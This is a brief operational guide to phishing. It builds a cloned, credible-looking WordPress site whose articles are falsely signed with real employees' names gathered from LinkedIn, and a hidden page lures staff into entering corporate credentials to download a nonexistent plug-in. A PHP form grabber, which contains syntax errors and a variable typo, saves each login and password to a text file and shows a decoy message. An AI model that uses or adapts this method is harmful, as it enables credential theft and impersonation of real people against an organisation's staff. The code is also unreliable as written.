Site Building

We want to design a legit-looking website. Only one hidden page will contain the password-grabbing form.

We will set up a Wordpress and take a similar theme.

Then we use HTTrack tool (https://www.httrack.com/).

To make it more credible, we pick up a few articles and load them into our website, signing them with legit employee names gathered from LinkedIn.

In the middle of this charade, we add a single hidden page that announces a new plug-in and invites users to athenticate using their corporate credentials to download said plug-in for example

We don't actually have that plug-in or somewthing else to show them, so when the victim enter their credentials, we will return a message saying that plug-in or whatever will be available in their country shortly, for example.

The backend code for the credential processing is a simple form grabber that writes credentials to a flat text file and sends a response.

// If login and password parameters exist and are not empty
if (isset($_POST['login'] and $_POST['password']
	and !empty($_POST['login'])
	and !empty($_POST['password'])){
// Display error message, then write credentials to a file
echo "The plug-in will be available in a cople of days in your region, please come back soon!"

$data = $_POST['login']."\t".$POST['password']."\n";
file_put_contents('/tmp/results.txt', $data, FILE_APPEND);
}

*Use the plug-in insert_php to write code in WordPress post and pages